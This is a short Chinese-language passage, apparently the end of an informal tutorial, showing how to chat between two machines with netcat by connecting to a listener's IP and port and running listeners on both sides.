然后就开始聊天咯:

加入聊天:nc [对方IP] [端口]

这样就好了,但是有个问题。。。别人能发信息给我我怎么发给别人?

啧,你让别人也开个服务端你再连上去不就好了么。。(端口不要冲突)

还有更多用法自己慢慢挖掘吧~

有耐心的一定要man nc看看啊